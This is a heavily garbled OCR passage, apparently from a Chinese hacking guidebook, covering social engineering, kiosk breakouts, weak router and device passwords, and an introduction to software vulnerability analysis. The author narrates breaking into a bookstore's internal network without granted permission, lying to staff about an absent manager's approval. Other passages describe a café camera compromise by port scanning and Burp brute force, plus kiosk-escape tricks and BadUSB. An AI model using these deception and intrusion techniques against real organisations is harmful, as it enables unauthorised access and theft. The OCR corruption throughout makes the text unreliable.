这 样 的 说 明 对 于 读者 来 说 肯定 还 有 些 抽象 ， 下 面 用 一 个 实例 来 解释 在 实际 应 用 中 ， 这 
个 模型 如 何 匹配 到 交流 过 程 中 的 每 一 个 元 素 。 


张 三 和 季 四 是 一 对 异地 恋 的 情侣 ， 张 三 每 周 都 要 给 节 四 写 一 封 信 诉 说 自己 这 周 的 生活 。 


在 这 个 实例 中 ， 张 三 即 是 模型 中 的 信息 发 送 方 ， 她 想 要 和 李 四 分 享 的 生活 细节 是 需 
要 发 送 的 信息 ， 将 这 些 信息 用 文字 书写 在 信纸 上 并 封装 即 是 编码 的 过 程 ， 邮 寄 方 式 是 这 次 
交流 的 信道 ， 作 为 接收 方 的 李 四 拆 开 信封 阅读 信件 的 过 程 即 是 信息 解码 过 程 。 而 窗外 的 天 
气 ， 隔 壁 王 二 麻子 的 暗 送 秋波 都 是 此 次 信息 传输 过 程 中 的 噪声 ， 李 四 在 收 到 信件 后 可 能 会 
用 QQ、 微 信 或 书信 的 方式 回复 张 三 ， 这 就 是 接收 方 给 发 送 方 的 反馈 。 

从 上 述 的 模型 中 可 以 清楚 地 看 到 ， 在 一 次 信息 沟通 过 程 中 人 们 可 以 操作 的 环节 ， 这 是 
有 计划 地 发 起 一 次 交流 性 信息 获取 的 基础 。 当 然 ， 在 安全 领域 的 实际 应 用 中 ， 事 情 往 往 
要 复杂 得 多 ， 一 次 成 功 的 社会 工程 学 攻击 行动 往往 涉及 好 几 次 不 同形 式 〈 通 利 在 此 语 韦 
下 人 们 所 说 的 不 同形 式 ， 其 区 别 都 在 于 信息 沟通 的 通道 ) 的 交流 过 程 ， 所 以 有 计划 地 设计 
一 次 行动 流程 以 及 其 中 每 个 交流 环节 的 逻辑 链 才 能 让 社会 工程 学 攻击 的 实施 者 更 加 从 容 不 
迫 ， 从 而 更 轻松 地 达成 目标 。 在 了 解 如 何 构 造 行动 流程 以 及 逻辑 链 之 前 ， 先 来 看 这 样 一 个 
пв: 


两 个 年 轻 人 背 着 包 来 到 一 家 书店 ， 在 二 楼 找 了 两 张 椅 子 坐 下 后 从 包 中 取出 了 计算 机 。 
三 分 钟 后 其 中 一 人 起 身 到 三 楼 找到 一 台 触摸 式 自助 图 书 查询 终端 机 并 打开 了 几 个 奇怪 的 窗 
口 。 此 举 引起 了 书店 管理 人 员 的 注意 并 上 前 查看 ， 年 轻 人 并 没有 因此 走 开 ， 而 是 主动 与 其 
搭 了 几 句 话 后 将 屏幕 恢复 成 来 时 的 样子 ， 去 书架 取 了 两 本 书 ， 回 到 二 楼 与 同伴 优 袁 游 哉 地 
坐 了 一 个 下 午 。 


读者 或 许 还 有 些 不 解 ， 这 两 个 年 轻 人 是 为 何 而 来 ， 又 做 了 什么 呢 ? 事实 上 这 是 笔者 的 
一 次 杂 映 经 历 ， 为 了 癌 朋 友 证 明 漏洞 在 人 们 的 生活 中 无 处 不 在 ， 笔 者 决定 针对 上 自己 最 喜欢 
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去 的 书店 进行 一 次 社会 工程 学 攻击 ， 并 尝试 获取 书店 部 分 内 部 信息 来 展示 大 多 数 企业 对 于 
保护 目 喘 安全 的 无 能 。 当 然 ， 我 们 双方 都 为 此 下 了 注 ， 赌 注 是 一 顿 目 助 餐 。 

确定 目标 后 ， 笔 者 首先 对 书店 进行 了 一 次 侦察 ， 发 现 其 三 询 终 病 机 缺少 对 用 户 输 入 的 
限制 ， 而 但 询 终 病 机 往往 是 接 入 公司 内 网 的 ， 管 理 员 通过 终端 机 进行 的 操作 记录 也 极其 可 
能 泄露 重要 的 信息 。 可 这 家 书店 每 层 都 有 很 多 工作 人 员 管 理 ， 光 明正 大 地 操作 终端 机 显然 
不 聪明 ， 通 过 给 不 连接 外 网 的 终端 机 植 入 木马 远程 控制 渗透 显然 也 不 是 什么 好 主意 。 但 抱 
看 “既然 问题 存在 ， 就 应 当 加 以 利用 ”的 原则 ， 笔 者 最 终 还 是 决定 以 这 台 终 端 机 作为 突破 
口 来 渗透 目标 书店 ， 并 很 快 制订 了 一 个 如 下 的 渗透 方案 : 


与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 一 进入 书店 对 终 
端 机 进行 操作 一 通过 内 网 渗透 获取 信息 。 


在 这 次 渗透 行动 中 ， 主 要 需要 考虑 的 只 有 两 次 交流 ， 自 先是 从 书店 省 理 层 获得 测试 许 
可 ， 其 次 则 是 如 何 面 对 普 通 工 作 人 员 和 保安 的 盘问 。 

在 互联 网 上 进行 了 仔细 的 寻找 后 ， 笔 者 并 没有 发 现 该 书店 任何 管理 人 员 如 手机 号 或 个 
人 邮箱 等 联系 方式 ， 但 作为 一 家 大 型 连锁 书店 ， 通 过 其 网 站 上 的 客服 QQ 联系 工作 人 员 和 总 
是 个 可 行 的 方案 ， 虽 然 这 些 客服 QQ 的 主人 未 必 具 有 许可 的 权限 ， 但 他 们 一 定 拥 有 癌 上 级 
反馈 的 渠道 ， 抱 看 这 样 的 想法 ， 笔 者 开始 设计 初次 交流 的 逻辑 链 了 。 

一 次 有 价值 的 交流 不 同 于 闲聊 ， 想 要 从 交流 中 获 益 就 必须 有 明确 的 逻辑 性 ， 而 拥有 一 
个 好 的 逻辑 链 的 第 一 步 ， 就 是 拥有 明确 的 目的 。 

首先 可 以 直接 将 行动 规划 中 的 部 分 逻辑 代入 作为 目标 ， 所 以 这 里 笔者 的 目的 就 是 : 


与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 
先 将 达成 目标 的 综合 行为 代入 逻辑 链 : 


通过 与 书店 网 站 客服 沟通 获得 引荐 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查 
询 系统 漏洞 ”的 许可 。 


再 把 交流 模型 代入 到 行为 中 : 
信息 发 送 方 : 笔者 + 要 编码 的 信息 (应 当 将 笔者 引荐 给 书店 管理 层 人 员 ) 一 编码 一 信 
道 互联 网 一 接收 方 : 书店 官方 客服 一 解码 信息 (认可 笔者 的 要 求 ) 一 将 笔者 引荐 给 书店 


管理 层 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 


确定 交流 模型 的 具体 元 素 后 ， 作 为 信息 发 送 方 尤其 要 对 编码 环节 进行 设计 ， 在 当前 的 
说 服 实例 中 ， 证 明 目 己 的 能 力 并 提出 要 求 显 然 是 一 个 不 错 的 方案 ， 将 其 放 入 逻辑 链 中 对 应 
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的 地 方 ， 再 把 整个 逻辑 链 加 以 整理 。 


寻找 一 个 话题 一 对 书店 客服 人 员 发 起 交流 一 引起 对 方 的 兴趣 一 让 对 方 对 自己 放松 警惕 
一 证 明 自 己 的 专业 性 一 提出 合理 的 请 求 一 说 服 书店 网 站 的 客服 人 员 一 将 笔者 引 莽 给 书店 管 
理 层 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 


制定 好 逻辑 链 后， 就 是 计划 实施 环节 了 。 作 为 一 个 安全 人 员 的 一 大 好 处 就 是 ， 一 旦 你 
告诉 别人 目 己 做 的 事情 ， 总 是 可 以 很 快 引 起 他 们 的 兴趣 ， 当 然 在 这 之 前 你 需要 证 明 上 自己 。 

能 引起 对 方 注意 的 话题 中 最 有 效 的 就 是 让 他 们 意识 到 目 己 对 身边 事物 的 认 知 出 现 了 偶 
差 ， 比 如 对 目 己 公司 网 站 的 安全 性 抱 有 了 过 大 期 望 : 经 过 短暂 的 研究 ， 笔 者 很 快 发 现 了 该 
书店 官网 存在 的 一 处 问题 并 登录 进 网 站 后 台 ， 这 惑 足够 了 ， 笔 者 没有 继续 深入 而 是 截图 直 
接 联 系 了 客服 汇报 了 这 个 问题 。 看 样子 该 网 站 的 客服 是 从 来 没有 遇见 过 白 帽 子 提交 漏洞 的 
情况 ， 显 得 很 恢 讶 。 这 时 笔者 表示 目 己 是 一 个 学 生 ， 为 了 完成 学 校 要 求 的 课外 活动 想 要 对 
自己 最 爱 的 书店 进行 一 次 公益 的 安全 性 检查 ， 并 希望 能 获得 许可 。 很 快 客 服 人 员 便 答应 回 
信息 主管 汇报 此 事 ， 并 在 得 到 回复 后 加 笔者 留 下 的 邮箱 中 发 送 通知 邮件 。 

交流 进行 得 很 成 功 ， 可 是 现实 却 不 尽 如 人 意 ， 过 了 几 天 笔者 仍 未 收 到 书店 的 通知 ， 
于 是 联系 了 上 次 沟通 的 客服 人 员 ， 他 很 遗憾 地 告诉 笔者 信息 主管 X 先 生出 差 了 暂时 联系 不 
上 ， 押 以 短期 内 不 能 给 出 答复 。 当 然 ， 笔 者 对 此 军 不 感到 遗憾 ， 信 息 主 管 出 差 这 个 情报 是 
一 个 很 有 价值 的 信息 ， 知 道 了 这 条 信息 后 的 第 二 天 ， 笔 者 与 一 个 朋友 就 市 着 计算 机 出 现在 
了 目标 书店 。 紧 接 看 就 发 生 了 上 面 片 段 中 的 一 和 磊 ， 笔 者 在 操作 终端 机 时 忽然 发 现 其 连接 的 
居然 是 书店 无 线 网 ， 于 是 查看 并 记 下 了 热点 的 密码 。 在 这 期 间 书 店 的 工作 人 员 前 来 询问 并 
制止 违规 操作 ， 于 是 笔者 对 他 说 目 己 已 经 癌 信 息 主 管 请 示 过 ，X 主 管 说 笔者 可 以 随便 来 书 
店 试 试看 。 借 一 个 虚拟 的 管理 人 员 把 反 第 的 事情 轻 摘 淡 写 融 了 过 去 是 很 有 效 的 一 招 ， 尽 管 
工作 人 员 表 示 没 有 收 到 通知 ， 但 潜意识 中 也 已 经 认可 了 这 种 操作 行为 并 不 构成 什么 威胁 。 

笔者 完成 了 得 看 热点 口令 的 操作 并 从 运行 窗口 看 到 了 历史 记录 中 访问 共享 服务 器 的 
记录 后 ， 通 过 笔记 本 电脑 连接 了 书店 内 部 网 络 ， 并 在 共享 服务 器 中 发 现 了 很 多 共享 给 员工 
用 的 设备 管理 账户 、 密 码 ， 通 过 这 些 账 户 和 口令 进一步 攻陷 了 内 网 中 的 几 台 交换 机 与 服务 
器 。 之 后 笔者 将 该 漏洞 反馈 给 了 书店 的 工作 人 员 ， 同 时 也 赢得 了 一 顿 目 助 餐 。 

除了 上 述 场景 ， 在 日 前 生活 中 使 用 交流 模型 可 以 让 谈话 变 得 更 加 理性 ， 而 构造 逻辑 链 
的 行为 在 很 多 场景 ， 如 应 聘 、 请 假 、 商 业 谈判 中 都 可 以 带 来 莫大 的 帮助 。 
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如 果 询 问 一 名 安全 专家 如 何 保障 个 人 隐私 和 财产 安全 ， 一 本 厚 厚 的 书 也 许 都 无 法 记 完 
回答 。 而 对 于 “大 众 应 当 如 何 防御 社会 工程 学 攻击 ”这 样 的 问题 ， 答 案 往往 却 是 无 解 。 木 
桶 效应 指出 : 一 只 木 桶 能 装 多 少 水 取决 于 它 最 短 的 那 块 木板 ， 同 样 的 道理 也 适用 于 安全 体 
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系 。 一 个 体系 的 安全 强度 取决 于 它 最 不 安全 的 边界 ， 当 社会 工程 师 把 目光 投 问 整个 生活 中 
的 安全 问题 时 ， 漏 洞 和 问题 将 变 得 比比 缘 是 。 这 些 漏洞 和 问题 往往 就 伴随 着 人 们 的 粗心 大 
意 、 满 不 在 乎 和 一 知 半 解 ， 可 在 这 些 最 薄弱 的 边缘 环节 出 现 的 问题 ， 有 时 却 可 能 导致 整个 
安全 大 厦 的 衣 塌 。 社 会 工程 师 需 要 有 一 双 擅 长 发 现 被 人 们 忽略 了 的 问题 的 眼睛 ， 本 章 也 将 
束 这 类 问题 中 的 一 些 为 读者 进行 深入 浅 出 地 讲解 。 


731 终端 机 安全 


上 节 的 故事 中 ， 读 者 束 已 经 见 到 了 一 次 真实 的 由 终端 机 引起 的 安全 事故 。 事 实 上 终端 
机 漏洞 正 是 笔者 最 津津 乐 道 的 一 类 问题 ， 因 为 这 些 设 备 的 持 有 者 往往 都 是 银行 、 公 司 、 商 
场 、 学 校 等 大 型 目标 ， 这 些 厂商 可 能 会 投入 大 笔 的 资金 来 确保 其 安全 性 ， 可 终 疾 机 这 样 的 
“ 短 板 ” 一 旦 出 现 问题 就 可 能 导致 整个 大 的 安全 体系 土 朋 也 解 。 

当然 ， 大 多 数 的 终端 机 在 币 规 用 户 操作 下 都 是 不 会 出 现 问题 的 ， 那 么 恶意 攻击 者 又 是 
怎么 利用 这 些 设 备 的 呢 ? 最 重要 的 目 然 是 要 让 这 些 基 于 操作 系统 的 大 家 伙 们 回 到 操作 系统 
界面 。 导 致 这 类 漏洞 出 现 的 可 能 原因 可 以 分 为 便 件 问题 和 软件 问题 ， 下 面 将 为 大 家 一 一 
介绍 。 


1. 硬件 处 置 不 当 导 致 的 终端 机 系统 被 破解 


(1) 存在 外 置 的 USB 接 口 。 当 一 个 终端 机 没有 将 其 外 置 的 USB 接 口 封 起 来 时 ， 就 像 
是 一 块 送 给 攻击 者 吃 的 肥 肉 ， 历 届 黑 帽 大 会 上 ， 甚 至 曾 有 黑客 演示 过 通过 插入 恶意 USB 设 
备 让 指定 型 号 的 ATM 吐 钱 的 案例 。 当 然 ATM 的 USB 接 口外 露 现在 已 经 几乎 见 不 到 了 ， 但 
很 多 公司 的 设备 仍然 如 此 ， 这 种 情况 下 恶意 攻击 者 只 需要 插入 一 个 键盘 设备 即 可 控制 整 台 
机 器 。 

(2) 电源 姑 露 在 外 且 无 人 管理 。 很 多 终端 机 是 通过 在 开机 局 动 项 中 加 入 软件 启动 的 
脚本 来 在 开机 后 打开 应 用 软件 的 ， 这 样 如 果 电 源 暴 露 在 外 ， 攻 击 者 只 需要 将 机 器 重启 ， 并 
利用 终端 机 刚刚 进入 操作 系统 的 时 间 进 行 恶 意 操 作 ， 例 如 杀 死 应 用 软件 进程 ， 即 可 阻止 其 
进入 不 可 操作 的 界面 。 


2. 软件 设置 不 当 导 致 的 终端 机 被 破解 问题 


(1) 管理 员 留 下 了 方便 管理 机 器 的 后 门 。 很 多 懒惰 的 管理 员 为 了 方便 目 己 管理 终端 
机 ， 可 能 会 设置 一 些 特殊 手势 使 机 器 回 到 果 面 ， 例 如 双 指 旋转 等 。 攻 击 者 可 以 多 尝试 几 种 
手势 来 调 出 系统 界面 ， 同 时 ， 藏 在 条 面 边缘 的 键盘 也 会 导致 问题 ， 如 果 权 限 足 够 的 话 攻击 
者 可 以 直接 调 出 CMD 来 操作 机 器 ， 或 按 Win+D 组 合 键 直 接 回 到 桌面 ， 如 图 7-2 所 示 。 

(2) 没有 茶 止 右键 动作 。 在 安装 应 用 软件 之 前 ， 大 多 数 终端 机 触 屏 都 是 文 持 右键 操 
作 的 ， 例 如 长 按 动 作 和 旋转 动作 ， 如 果 应 用 软件 没有 茶 止 用 户 的 右键 操作 ， 那 么 通过 打印 
机 等 功能 再 调 出 系统 目录 ， 打 开 软 键盘 即 可 操作 当前 终端 机 。 

(3) 软件 漏洞 。 有 些 终 问 机 应 用 软件 本 身 束 存在 漏洞 ， 一 些 违 法 的 用 户 操 作 ， 例 如 
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按键 盘 同 时 单 击 屏幕 上 的 相同 功能 键 ， 或 者 多 指 触 控 快 速 点击 等 即 可 导致 软件 良 溃 ， 攻 击 


者 从 而 能 够 达到 控制 目标 终端 机 的 目的 。 
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图 7-2 软 键盘 导致 的 终端 机 被 破解 


7.3.2 无 线 网 中 的 路 由 兹 配置 问题 


从 各 大 运营 商 和 商业 巨头 开始 抢占 公共 热点 开始 ， 如 今 在 很 多 城市 从 商场 到 超市 ， 从 
咖啡 第 到 路 边 小 吃 店 ， 到 处 都 有 公共 热点 的 影子 。 可 又 不 时 地 有 人 爆料 这 些 公 共 热 点 不 安 
全 ， 这 显然 是 正确 的 。 撤 开 恶 意 AP 不 谈 ， 很 多 私人 商家 设置 的 无 线 网 络 本 身 就 毫 无 安全 


性 可 言 。 


很 多 家 用 路 由 器 是 不 强制 在 配置 中 修改 密码 的 ， 这 也 就 导致 了 很 多 没有 安全 意识 的 商 
家 在 配置 好 热点 后 从 来 没 想 过 要 修改 路 由 器 密码 ， 游 走 在 城市 中 ， 使 用 用 尸 名 admin、 密 
码 admin 往 往 可 以 登录 一 大 批 没 有 修改 密码 的 路 由 器 。 当 恶意 攻击 者 进入 路 由 嚣 后， 可 以 
使 用 端口 转发 等 多 种 方式 来 移 取 和 监控 用 户 的 上 网 信息 。 


7.3.3 ”管理 员 对 内 网 环境 的 盲目 自信 


安全 问题 是 很 多 网 络 管理 员 都 容易 忽视 的 问 
题 ， 即 使 他 们 想到 外 界 有 很 多 穷 凶 极 恶 的 黑客 ， 
也 不 会 意识 到 在 自己 的 内 网 里 ， 可 能 就 存在 几 台 
那 恶 的 计算 机 。 在 他 们 管理 下 的 很 多 设备 都 和 上 
述 无 线路 由 器 一 样 使 用 大 默认 密码 或 者 admin888 
这 样 极其 脆弱 的 弱 口 令 ， 就 如 这 人 台 影 院 的 交换 机 
一 般 ， 如 图 7-3 所 示 。 

说 到 内 网 中 的 设备 ， 最 让 攻击 者 激动 的 英 过 
于 摄像 头 了 ， 笔 者 的 一 位 朋友 就 很 热衷 于 在 城市 
中 寻找 漏洞 ， 下 面 就 是 他 针对 摄像 头 的 一 次 渗透 
全 过 程 ， 这 次 渗透 是 在 一 家 咖啡 厅 中 进行 的 。 
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7-3 ”笔者 随意 试 了 几 组 口令 就 直接 telnet 
登录 上 了 这 人 台 设 备 


МИ, n 


首先 ， 连 入 咖啡 厅 里 的 WiFi， 用 ipconfig 命 令 查 看 所 处 的 网 络 环境 ， 可 以 看 到 本 机 的 
IP 地 址 是 192.168.1.105， 网 关 地 址 是 192.168.1.1， 如 图 7-4 所 示 。 


Micros oft Windows ХР [h КА 5.1.2600] 
<C) hk 177) = 1985-2001 “бұқа soft Corp. 


C:\Documents and Settings ‘dministrator>ipconf ід 


Windows ІР Configuration 


无 线 网 络 连 控 : 


Ethernet adapter 
Connection—specific DNS Suffix . : 
ІР ñddres 2 192.168.1.105 
Subnet Mask о - s s s s ое © о . 3 4595.459.699.0 
Default Gateway = 192.168.1.1 
Ethernet adapter НЕ БЕ : 


Медіа Stat . . . . < < < < < = < © Мела Ф41соплесесен 


C:\Documents and бесбіпде “Ибтіпісекасбок> 


图 7-4 无 线 网 络 环境 
О RAMET === анат 
问 权限 进行 了 限制 。 接 下 来 ， 扫 描 所 处 网 段 的 端口 开放 情况 |шікел peor тт 


线程 :一 一 一 一 一 一 一 一 /一 一 一 
Ж 7-5) . КЕЕН 
这 里 将 端口 重新 设置 了 一 下 ， 分 别 设 置 了 21、80、 ья 205. ВЕ ята 


1433、3306、8000、8080、8081 几 个 端口 ，IP 端 设置 的 是 Е 
192.168.1.1 一 192.168.1.23$， 然 后 开始 扫描 。 不 一 会 扫描 结 
果 便 出 来 了 ， 简 单 整理 为 如 下 内 容 。 

192.168.1.1 80 

192.168.1.103 21 

192.168.1.205 80 

192.168.1.23121 

从 经 验 判 断 ，192. 168.1.205 应 该 РЕЗ, RAEN 98 ЕЗИ 77 19], W 7-6/Т7х 


т |Е)һер://192.168.1.205/ 


图 7-5 ”扫描 端口 


图 7-6 ”登录 接口 
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МДҮ ЧА 黑客 与 安全 技术 指南 


用 Burp 工 具 对 登录 框 进行 抓 包 并 尝试 暴力 破解 ， 很 快 便 爆 破 成 功 : 用 户 名 为 admin; 
密码 为 admin123， 并 成 功 登 录 〈( 见 图 7-7) 5 


GAMERA 


图 7-7 用 Burp 工 具 破 获 用 户 名 、 密 码 并 成 功 登 录 
从 上 例 可 以 看 出 ， 这 些 被 人 们 忽略 的 设备 ， 其 安全 性 就 犹如 空气 一 般 不 堪 一 击 。 这 也 
正 是 安全 专家 们 对 于 个 人 信息 安全 能 够 给 出 无 数 建议 的 原因 ， 由 于 人 们 喘 边 存在 太 多 的 安 
全 隐患 ， 对 于 每 个 人 来 说 ， 武 装 到 牙齿 的 保护 也 未 必 能 够 确保 目 己 的 隐私 或 者 信息 不 被 泄 
露 ， 也 内 能 做 得 越 多 越 好 了 。 


7.4 社会 工程 学 工具 


孔子 说 “ 工 欲 善 其 事 ， 必 先 利 其 器 ”， 相 信 大 家 都 耳熟能详， 好 的 工具 能 使 你 的 工作 
效率 提高 不 少 ， 熟 练 使 用 正确 的 工具 则 会 大 大 提高 工作 效率 ， 本 节 将 讲解 社会 工程 学 中 用 
到 的 工具 。 


7.4.1 在 线 工具 


在 线 信息 搜集 的 重要 性 前 面 已 经 提 到 ， 下 面 首 先 来 看 看 社会 工程 学 中 的 在 线 工具 。 
1. 搜索 引擎 


在 我 国 ， 绝 大 多 数 人 喜欢 使 用 的 搜索 引擎 不 是 谷歌 ， 而 是 百度 。 百 度 的 衍生 产品 也 非 
帝 多 ， 例 如 百度 贴吧 ， 如 朱 我 们 需要 得 找 一 个 人 的 信息 资料 ， 有 什么 资料 比 他 目 己 曾 经 说 
过 的 话 更 直观 呢 ? 百度 贴吧 这 个 平台 则 很 可 能 会 令 人 满意 的 内 容 。 同 时 ， 搜 索引 擎 拥有 一 
种 “语法 ”， 善 用 搜索 引擎 的 语法 ， 能 达到 事半功倍 的 效果 。 


2. Maltego 
Maltego 是 一 球 功 能 非常 强大 的 软件 ， 它 能 够 目 动 采 集 大 量 信息 并 且 为 用 户 实现 数量 
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第 7 章 ” 初 识 社会 工程 学 一 一 bug 出 在 人 身上 уде 7 Жа 


的 目 动 关联 ， 可 以 为 用 户 节 省 数 小 时 的 搜索 时 间 ， 并 且 可 以 展示 信息 的 关键 图 ， 它 的 真正 
强大 之 处 在 于 找到 这 些 数据 之 间 的 关系 ， 即 便 数据 的 价值 很 高 ， 但 是 展示 信息 之 间 的 关系 
对 于 社会 工程 人 员 更 有 价值 。 


3. 社会 工程 人 员工 具 包 


近 些 年 来 ， 出 现 了 很 多 社会 工程 人 员工 具 包 ， 它 们 比较 符合 国人 的 使 用 习惯 ， 社 会 工 
程 人 员工 具 包 包括 众多 的 小 工具 ， 在 各 种 工具 包 中 ， 你 可 以 找到 很 多 你 喜欢 的 或 者 常用 的 
工具 ， 你 也 可 以 去 找 找 国 外 的 社会 工程 人 员工 具 包 ， 其 中 有 诸如 PDF 攻击 一 类 的 小 工具 。 


7.4.2 物理 工具 

除了 一 些 在 线 工 具 ， 社 会 工程 学 所 使 用 的 物理 工具 也 不 少 ， 其 中 很 多 都 是 生活 中 常见 
的 物品 ， 这 也 印证 了 那 句 话 “没有 办 不 到 ， 只 有 想不到 ”。 

1. ОЖ 


在 U 盘 里 安装 好 系统 ， 例 如 Kali Linux， 随 时 能 在 各 种 计算 机 上 插入 启动 。 与 U 盘 类 
似 ，BadUSB 也 可 以 用 于 进行 社会 工程 学 攻击 。 


2. 名 片 和 特殊 服装 


在 与 人 接触 时 ， 一 张 看 起 来 符合 目 己 身份 的 名 片 可 以 让 目标 很 快 对 攻击 者 产生 信任 
感 ， 同 时 一 些 特殊 服装 可 以 帮助 他 们 伪装 成 一 些 特殊 身份 一 一 比如 在 前 文 提 到 的 伪装 成 快 
弟 小 哥 ， 就 需要 一 件 快 递 公司 工 作 人 员 的 服装 。 


З. 纸张 和 笔 


无 论 在 哪里 ， 随 喘 携 帝 纸 和 笔 都 是 一 个 很 好 的 习惯 ， 不 同 于 电子 备 瑟 录 ， 纸 张 给 人 的 
发 挥 空间 更 大 ， 不 仅 可 以 随时 记录 目前 的 进展 情况 ， 还 可 以 规划 下 一 步 动 作 。 但 一 定 要 注 
意 销 毁 重 要 内 容 ， 别 让 这 个 习惯 成 为 绊脚石 。 


75 社会 工程 学 的 应 用 


社会 工程 学 是 一 门 独特 且 富 有 魅力 的 学 科 ， 它 来 源 于 生活 ， 但 社会 工程 学 只 是 一 门 独 
立 的 学 问 吗 ?当然 不 是 ! 下面 就 来 探讨 社会 工程 学 和 其 他 技术 的 配合 方法 。 


7.5.1 社会 工程 学 与 前 端 安全 
有 一 个 经 典 的 社会 工程 学 攻击 案例 ; 社会 工程 人 员 利用 人 们 的 好 奇 心 或 者 贪图 小 便 
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АА 黑客 与 安全 技术 指南 


当 打 开 一 个 文档 或 用 浏览 器 打开 一 个 网 址 时 ， 也 许 读 者 会 很 快 被 文档 或 网 页 中 的 丰富 
的 内 容 所 吸引 ， 但 你 却 不 会 知道 ， 这 可 能 有 一 个 木马 已 经 悄悄 地 在 目 己 的 计算 机 里 留 下 了 
后 门 ， 你 的 游戏 账号 、 隐 私信 息 等 正在 被 屏 医 男 一 端的 攻 茶 茶 拿 走 。 现 在 应 用 软件 层 出 不 
穷 ， 无 论 是 微软 、Adobe 这 些 大 型 公司 ， 还 是 一 些 不 知名 的 小 公司 旗下 都 有 众多 产品 。 有 
位 大 牛 曾经 说 过 ， 不 可 能 存在 绝对 安全 的 软件 ， 在 这 一 章 中 ， 笔 者 将 市 大 家 走 入 漏洞 的 世 
界 ， 看 看 一 个 小 小 的 逻辑 错误 究竟 会 造成 怎样 的 严重 后 果 。 

这 一 章 会 涉及 很 多 汇编 语言 和 C 语 言 的 知识 ， 笔 者 尽量 降低 难度 为 大 家 还 原 漏 洞 触发 
以 及 攻击 的 整个 过 程 ， 并 罕 插 介绍 一 些 汇编 语言 和 C 语 言 的 知识 。 


8.1 Эн ле 


8.1.1 什么 是 软件 漏洞 分 析 


Web 闹 有 Web 端 的 漏洞 ， 系 统 有 系统 的 漏洞， 应 用 软件 有 应 用 软件 的 漏洞 ， 而 它们 绝 
大 多 数 都 是 由 于 简单 的 逻辑 错误 导致 的 ， 所 以 从 另 一 个 角度 讲 ， 黑 客 和 程序 员 也 有 着 生丝 
万 缕 的 联系 。 有 时 候 当 一 个 程序 员 费 了 几 个 月 的 时 间 号 了 几 十 万 行 代码 ， 但 是 黑客 一 个 小 
小 的 操作 可 能 就 要 让 这 个 程序 重 写 一 人 遍 。 

其 实 漏 洞 的 分 析 就 是 在 逆向 进行 漏洞 发 生 的 过 程 ， 假 如 说 这 个 程序 因为 执行 了 共 些 函 
数 和 茶 些 畸形 字符 串 骨 沉 了， 如 果 崩 演 的 这 一 刻 叫 作 案 发 现场 的 话 ， 我 们 就 要 回溯 到 程序 
зА, АЗ Вие? fE. 

在 此 之 前 ， 需 要 卉 懂 一 些 概念 ， 首 先是 栈 的 概念 ， 这 对 于 漏洞 分 析 全 关 重 要 。 其 实 
无 论 是 漏洞 ， 还 是 逆 四 这 样 的 反 汇 编 操 作 ， 或 是 正四 的 编程 ， 我 们 都 需要 了 解 它 们 ， 因 为 
PC 端 和 移动 端 都 一 样 ， 都 有 堆栈 操作 。 

栈 其 实 可 以 看 作 一 块 空间 ， 当 调用 一 个 函数 参数 的 时 候 ， 这 个 参数 就 会 进 到 这 个 栈 
里 ， 这 个 空间 就 好 像 一 个 死胡同 ， 先 进来 的 就 在 最 里 面 ， 后 和 面 依次 排列 ， 所 以 栈 对 于 参数 
的 操作 是 先进 后 出 ， 后 进 先 出 。 

其 实 一 个 程序 的 操作 就 是 不 断 地 在 对 栈 操作 ， 当 调用 一 个 函数 的 时 候 ， 就 会 开辟 一 块 
栈 空间 ， 然 后 把 这 个 函数 要 用 的 参数 全 部 放 到 栈 里 ， 经 过 一 系列 操作 之 后 ， 会 将 这 些 参 数 
释放 出 来 ， 返 回 茶 些 结果 给 外 层 的 调用 函数 ， 最 后 再 释放 这 块 空间 ， 而 大 多 数 的 漏洞 部 是 
发 生 在 这 里 。 

所 谓 缓冲 区 洲 出 ， 可 以 分 为 栈 洲 出 和 堆 洲 出 ， 说 白 了 就 是 在 进行 这 些 函 数 操作 的 时 
候 ， 可 能 由 于 一 个 1f 语 句 或 者 一 个 strcpy 函 数 导 致 栈 或 者 堆 被 破坏 ， 导 致 程序 无 法 正常 执行 
它 该 执行 的 内 容 ， 这 就 造成 了 骨 沉 ， 也 就 造成 了 漏洞 的 产生 。 
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8.1.2 漏洞 分 析 的 作用 


有 很 多 人 觉得 漏洞 分 析 没 什么 用 ， 不 如 那些 Web 端 漏洞 危险 ， 其 实 软件 漏洞 造成 的 危 
害 是 极 大 的 ， 例 如 2008 年 一 个 震 居 世界 的 超级 漏洞 MS08-067， 将 整个 Windows XP 系统 以 
及 Windows Server 2003 系 统 推 到 了 风口 浪 尖 。 很 难 想 象 ， 当 输入 对 方 的 一 个 IP 地 址 ， 就 能 
够 控制 对 方 的 计算 机 ， 时 至 今日 ，MS08-067 依 然 被 应 用 在 黑客 的 攻防 当中 ， 而 这 个 漏洞 
诞生 的 原因 正 是 对 于 “/” 字 符 的 向 前 检索 。2014 年 仍然 是 漏洞 集体 爆发 的 一 年 ， 年 初 的 
“心脏 出 血 ”、 年 中 的 shellshock 破 充 、 年 确 的 下 “ 神 洞 ”CVE2014-6332 都 是 危害 等 级 极 
高 的 神 级 漏洞 。 

通过 漏洞 分 析 ， 我 们 不 仅 能 看 到 整个 漏洞 爆发 的 过 程 ， 还 能 找到 利用 它 的 方式 ， 这 里 
白 帽 子 会 积极 联系 厂商 及 时 修复 ， 而 黑客 会 继续 开发 Exploit， 利 用 漏洞 来 发 起 一 个 又 一 个 
的 攻击 。 

无 论 是 出 于 对 用 户 的 保护 ， 还 是 出 于 私人 的 目的 ， 漏 洞 分 析 都 是 必 不 可 少 的 过 程 。 这 
里 笔者 要 特别 提 及 一 下 POC 这 个 概念 ，POC 是 漏洞 验证 的 程序 ， 用 来 验证 在 你 配置 的 漏洞 
分 析 环 境 下 ， 是 否 能 够 成 功 触发 漏洞 ， 而 POC 里 不 包含 恶意 代码 ， 就 好 像 网 上 的 绿色 软件 
一 样 。shellcode 是 传说 中 的 恶意 代码 ， 也 就 是 在 利用 漏洞 的 时 候 ， 通 过 触发 软件 漏洞 使 程 
序 去 执行 shellcode， 从 而 远程 完成 在 目标 计算 机 上 的 操作 。 

